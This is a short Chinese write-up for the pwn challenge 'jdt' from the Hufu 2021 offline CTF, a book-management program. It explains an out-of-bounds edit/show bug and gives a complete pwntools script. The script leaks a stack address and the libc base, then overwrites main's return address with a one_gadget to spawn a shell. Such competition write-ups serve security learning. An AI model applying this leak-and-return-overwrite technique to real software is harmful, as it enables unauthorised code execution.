虎符2021线下赛pwn writeup

Posted 2021-05-13 不会修电脑

jdt

　　一个图书管理系统，但并不是常规的堆题。edit和show函数可以越界。edit函数和show函数相互配合泄露libc基地址，将main函数的返回地址覆盖成onegadgets拿shell。

from pwn import *

p = process(\'./pwn\')
elf = ELF(\'./pwn\')
libc = ELF(\'./libc.so.6\')

context(os=\'linux\',arch=\'amd64\',log_level=\'debug\')

def duan():
    gdb.attach(p)
    pause()
def add(price,author,name,description):
    p.sendlineafter(\'Choice: \',\'1\')
    p.sendafter(\'Price?\',str(price))
    p.sendafter(\'Author?\',author)
    p.sendafter(\'name?\',name)
    p.sendafter(\'Description?\',description)
def show(index):
    p.sendlineafter(\'Choice: \',\'3\')
    p.sendlineafter(\'idx?\',str(index))

show(16)
p.recvuntil(\'Author: \')
addr = u64(p.recv(6).ljust(8,\'\\x00\'))
print \'addr-->\'+hex(addr)

p.sendlineafter(\'Choice: \',\'2\')
p.sendlineafter(\'idx?\',\'16\')
p.sendlineafter(\'Choice: \',\'2\')
p.sendafter(\'Author?\',\'a\'*8)
show(16)
p.recvuntil(\'aaaaaaaa\')
libc_base = u64(p.recv(6).ljust(8,\'\\x00\'))-240-libc.symbols[\'__libc_start_main\']
print \'libc_base-->\'+hex(libc_base)
og = [0x45226,0x4527a,0xf0364,0xf1207]
shell = libc_base+og[0]

p.sendlineafter(\'Choice: \',\'2\')
p.sendlineafter(\'idx?\',\'16\')
p.sendlineafter(\'Choice: \',\'2\')
p.sendafter(\'Author?\',p64(addr)+p64(shell))

p.sendlineafter(\'Choice: \',\'5\')
p.interactive()